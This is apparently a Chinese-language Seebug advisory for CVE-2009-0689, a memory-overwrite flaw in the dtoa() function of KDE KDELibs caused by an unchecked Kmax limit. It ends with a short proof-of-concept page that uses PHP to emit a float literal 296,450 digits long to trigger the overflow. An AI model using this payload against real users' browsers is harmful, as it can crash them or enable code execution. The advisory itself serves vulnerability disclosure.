KDE KDELibs 'dtoa()'远程代码执行漏洞

2009-11-24T00:00:00
ID SSV:14969
Type seebug
Reporter Root
Modified 2009-11-24T00:00:00

Description

Bugraq ID: 37080 CVE ID:CVE-2009-0689

KDE是一款UNIX工下开源图形桌面环境。 KDELibs是建立在Qt框架之上,它提供框架和众多功能来开发KDE程序。其中dtoa实现存在错误,处理特殊构建的浮点数可导致内存覆盖。由于Kmac定义为15,dtoa函数没有检查Kmac限制,可能调用大于等于16的freelist数组元素。

KDE 4.3.3 目前没有详细解决方案提供: http://www.kde.org/

                                        
                                            
                                                - -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------